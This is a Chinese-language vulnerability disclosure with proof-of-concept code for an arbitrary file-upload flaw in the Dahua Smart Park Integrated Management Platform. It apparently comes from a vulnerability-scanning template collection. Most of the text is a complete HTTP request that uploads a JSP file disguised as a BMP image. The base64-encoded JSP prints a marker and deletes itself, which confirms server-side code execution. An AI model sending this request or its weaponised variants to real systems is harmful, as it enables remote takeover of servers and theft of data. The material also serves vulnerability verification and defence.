漏洞描述
大华智慧园区综合管理平台是一款用于智慧园区管理的综合系统。该平台的 /publishing/publishing/material/file/image 接口存在文件上传漏洞,攻击者可以通过上传特制的文件(如JSP文件),在服务器上执行恶意代码,从而实现远程控制。这可能导致敏感信息泄露、数据篡改以及系统被完全控制等严重后果。
大华智慧园区综合管理平台 /publishing/publishing/material/file/image 文件上传漏洞
PoC代码
POST /publishing/publishing/material/file/image HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=gzcukzwm
{{b64decode(LS1nemN1a3p3bQ0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJmaWxlIjsgZmlsZW5hbWU9ImV0amd4ZHVmLmpzcCINCkNvbnRlbnQtVHlwZTogaW1hZ2UvYm1wDQoNCkJNtgAAAAAAAAA2AAAAKAAAAAoAAAAEAAAAAQAYAAAAAACAAAAAxA4AAMQOAAAAAAAAAAAAAGg2AWg2AWc1AGc1AGc1AGc1AGc1AGc1AGY3AWY3AQAAZzUAZzUAZzUAZzUAZzUAaDYBZzUAZzUAZjcBZjcBAABnNQBnNQBnNQFmNABnNQBoNgFnNQFmNABnNQBnNQAAAGg2AWg2AWg2Amc1AWc1AGc1AGY0AGY0AGc1AGc1AAAAPCVvdXQucHJpbnQoImtibGtteGd1Iik7bmV3IGphdmEuaW8uRmlsZShhcHBsaWNhdGlvbi5nZXRSZWFsUGF0aChyZXF1ZXN0LmdldFNlcnZsZXRQYXRoKCkpKS5kZWxldGUoKTslPg0KLS1nemN1a3p3bS0tDQo=)}}